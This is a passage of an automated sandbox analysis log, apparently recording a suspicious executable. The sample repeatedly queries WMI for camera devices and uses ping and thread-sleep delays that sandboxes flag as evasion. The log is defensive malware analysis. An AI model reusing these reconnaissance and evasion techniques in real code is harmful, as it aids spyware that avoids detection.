                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost Jump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe TID: 5508Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 5376Thread sleep time: -30000s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -600000s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -599878s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -599750s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -599641s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -599516s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -599391s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -599281s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 6056Thread sleep time: -10800000s >= -30000sJump to behavior
